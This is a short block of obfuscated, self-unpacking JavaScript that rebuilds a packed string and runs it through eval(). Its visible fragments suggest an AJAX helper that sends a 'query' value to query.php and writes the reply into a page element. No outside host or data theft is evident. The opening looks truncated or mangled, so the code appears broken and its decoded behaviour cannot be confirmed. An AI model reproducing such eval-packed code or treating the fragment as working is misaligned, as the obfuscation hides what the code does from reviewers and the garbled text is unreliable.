Ec=46;c--;d=(t=d 5\'!#$%&*+-/<>?@ABDEFGHIJKLMNOPQRTUVWXYZ^_`wyz|~\\\\\'[c])) 7t.pop())); 8 &=d J %}; 8unAJAX Nj C3 L ,B ]* ca(g_j); 3 cc ,T 0 Wc)} 3 b CBself=this; 3 G=="GET"){g_m=  v+  w+ Wg + Xg_m U *  X  v U;try{  b.setRequestHeader("Content-Type","application/x-www-form-urlencoded" 4){}}  b.onreadystatechange !){switch( #b.readyState){case 1: #y /2: #z /3: #A /4: := #b.r &Text; :XML= #b.r &XML; #r[0 T; #r[1 TText; 3#M){self.r H 3#T C(= #T.nodeName; (.toLowerCase(); 3(=="input Iselect Ioption Itextarea" C#T. ?= : *#T.innerHTML= :}} 3#r[0]=="200" C#D ]*#C()} #cg="";break} Qb.send( Wg)}} Qu ]+cd()} [.ajax 9g_p();try{ Bg_K 0\'g_J\') )o("query",g_K _F _h) )v="query.php" )G OK _G _h )cc=\'g_cb\' )y Oa )z Od )A Oe )D Of; K 4){ K)}  this _ !=function( #self _ $encodeURIComponent( %e +cc >T >v=file +g 9Object ]+r 9 .(2) &esponse (elemNodeName );ajax _ *}else{  +;   , C  -try{  b 9ActiveXObject("M .Array /();break;case  0=document.getElementById( 2true 3if(  4)}catch(e 5.split( 6.length 7.join( 8this.r 9=new  :self.r & ;T" +w="?" +cf="&" +c <return = !){ Q >=null + ?value @  g[key][ A(g_k[0],g_k[1]) Bvar  C){  E;for( FXMLHttpRequest HunR &()} I"|| (==" J +P= 2 +M=fals Kajax.runAJAX( M ,cg+= Wf+g_ N !g_ O=g_ Q} + RbIO#6z% T]= #b.status U, 2) V.XMLHTTP" 4 W  c Xb.open(  G, Y ! , Zg_ce [window ]()  ^g_h[g_E]} _.g_ `#a#';for(c=112;c;d=(t=d.split('   ! # $ % & ( ) * + , - . / 0 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C E F H I J K M N O Q R T U V W X Y Z [ ] ^ _ `'.substr(c-=(x=c<2?1:2),x))).join(t.pop()));eval(d)

